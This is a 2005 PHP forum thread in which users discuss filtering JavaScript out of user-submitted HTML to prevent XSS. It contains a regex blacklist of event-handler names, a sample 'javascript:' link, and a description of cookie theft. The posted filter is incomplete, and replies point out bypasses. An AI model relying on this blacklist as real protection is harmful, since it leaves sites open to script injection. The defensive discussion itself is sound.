Page 1 of 1

javascript =)

Posted: Sun Sep 25, 2005 11:06 am
by s.dot
Do all javascripts need to be triggered by an event? Such as onLoad, onMouseOver, onMouseOut... etc.

If I replace all of these words with 'bswords' or something similar.. will this effectively disable javascript?

Posted: Sun Sep 25, 2005 11:17 am
by feyd
the events are just one avenue Javascript may be run from. Others include simply inline, external source inclusion... at any rate, this feels like it should be in Security, if you're wanting to filter the input to protect something...

Posted: Sun Sep 25, 2005 11:31 am
by s.dot
hmm... this was just my prequisite to the security question. In order to protect against it, i needed to know how it can be delivered ;)

Edit: I guess this could be switched over to security now =). As a beginning to disabling javascript, I should filter the <script></script> tags. Perhaps strip_tags() would get rid of that. Then I'll replace all of the event words with something (yet to figure that out). Where should I go from there? I'm just trying to get some logic.. in english.. then translate that to code.. later.

Posted: Sun Sep 25, 2005 1:50 pm
by Ambush Commander
Here's what I'm thinking.

1. Parse all tags and remove tags not on whitelist (tags not on whitelist include <script></script>). Check tags for well-formedness, make sure the nesting is correct
2. Parse all attribute values to make sure their forms are compliant with the doctype and on your attribute whitelist for a particular tag. So, an A tag would have HREF whitelisted but not ONCLICK. And the attribute parser would make sure that HREF != "javascript:do_evil_stuff"

By the way, if you end up doing all that, could you, like, release the code publicly? It would be a really nice HTML library. :D

I'm calling for a shoot first, ask questions later policy. Rather than asking yourself what you should get rid of, ask yourself what you should keep. But by doing this, a simple regexp solution will not work.

Ideally... You implement a doctype parser. You then extend that parser to include more restrictions that are not possible in current doctype syntaxes. Then, you build a simplified doctype for what you would consider "secure" (leave out definitions for SCRIPT et cetera). You may need to hardcode extra restrictions. Then, you feed it into a script that parses HTML tags. Allow for some smartness when correcting tags, a Tidy like project. Have the script parse everything, and then have it check it with the doctype. Implement parsers for all RFC definitions, and whitelist those accordingly: this will be used for the attributes.

Of course, this is overkill

But it's still mad cool. X)

Posted: Thu Sep 29, 2005 8:43 am
by s.dot
well here's what I got so far.. it might not be as advanced as described above :P but it's a start..

Currently it replaces everything from <script... /script> with nothing.
Then replaces javascript event handlers with "badboy".
However I don't think this list is complete.

Code: Select all

/* Strip javascript.. or attempt to */
function me_strip_js($string)
{
	/* Replace everything between <script></script> tags with nothing */
	$string = preg_replace("#<script.+?/script>#ism","",$string);
	
	/* If they didn't place an </script> tag, replace the <script> with nothing */
	$string = preg_replace("#<script.+?>#ism","",$string);
	
	/* Replace javascript event handlers that are inside of < >'s */
	$string = preg_replace('/(<[^>]*?)\bonabort\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonblur\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonchange\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonclick\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bondblclick\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bondragdrop\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonerror\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonfocus\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonkeydown\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonkeypress\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonkeyup\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonload\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonmousedown\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonmousemove\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonmouseout\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonmouseover\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonmouseup\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonmove\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonreset\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonresize\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonselect\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonsubmit\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\bonunload\b(.+?>)/is', "$1badboy$2", $string);
	$string = preg_replace('/(<[^>]*?)\biframe\b(.+?>)/is', "$1badboy$2", $string);
	
	/* Return the result */
	return $string;
}
What would be my next step in removing javascript? Previously the only way I knew how to include javascript was with an event handler.

Posted: Thu Sep 29, 2005 8:56 am
by CoderGoblin
Now what would happen if I entered an Iframe to load a subpage with my javascript in referring to it's parent window ? If the subpage is also processed this would not be a problem.

Posted: Thu Sep 29, 2005 8:57 am
by s.dot
you can't load an iframe, look at my last regex :P

Posted: Thu Sep 29, 2005 8:59 am
by CoderGoblin
Missed it... OK :wink:

Posted: Fri Sep 30, 2005 1:07 am
by pilau
Why would you want to disable all JavaScript?

Posted: Fri Sep 30, 2005 2:35 am
by n00b Saibot
pilau wrote:Why would you want to disable all JavaScript?
so that I would stop hacking his site :P

Posted: Fri Sep 30, 2005 10:12 pm
by Ambush Commander
You missed the pseudoprotocol javascript.

Code: Select all

<a href="javascript:do_some_badstuff();">Don't click here!</a>

Posted: Sat Oct 01, 2005 1:39 am
by n00b Saibot
drats! you told him :( now i will have to search another way :lol:

Posted: Sat Oct 01, 2005 11:40 am
by Ambush Commander
I also have a vague suspicion that it doesn't actually work on IFRAME tags (the \b thing prevents <iframe from matching)

Posted: Sat Oct 01, 2005 12:00 pm
by pilau
Again: why would you want to disable Javascript?

Posted: Sat Oct 01, 2005 12:20 pm
by Ambush Commander
JavaScript, being a programming language, can be exploited easily. While webbrowsers try to do the best they can to prevent the writer of the system from abusing the user (such as preventing write access to a file upload field), it cannot protect a website from itself.

JavaScript has the ability to read and write cookies, as well as the ability to transmit their contents. Say I have a webpage that allows arbitrary HTML to be posted on it. An attacker could concievably post a JavaScript snippet that would send the contents of all cookies to the attacker, and thus an XSS attack. They could make an infinite loop on a modal dialogue, and render the browser useless (if you do while(true) alert('Haha!'); on Firefox, there is no way to abort except by using the Task Manager). You'd have to be a fool to allow user-submitted JavaScript on pages that are accessible by everyone.

There are notable exceptions. Wikipedia, for instance, offers a page called monobook.js to it's users. Only the owner of this page is allowed to edit it, and the JavaScript written there is automatically included in their page when they are logged in, but don't affect anyone else. When no one but the attacker can see the JavaScript, there is no security hole. If people are writing content for the masses, they can publish it without moderation (you can always try auditing JavaScript code for things that specifically need it), and they can use JavaScript, that's a security hole.